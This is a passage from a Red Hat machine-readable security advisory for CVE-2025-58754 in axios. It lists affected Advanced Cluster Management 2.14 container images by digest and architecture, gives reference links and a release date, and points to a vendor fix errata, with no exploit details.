"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
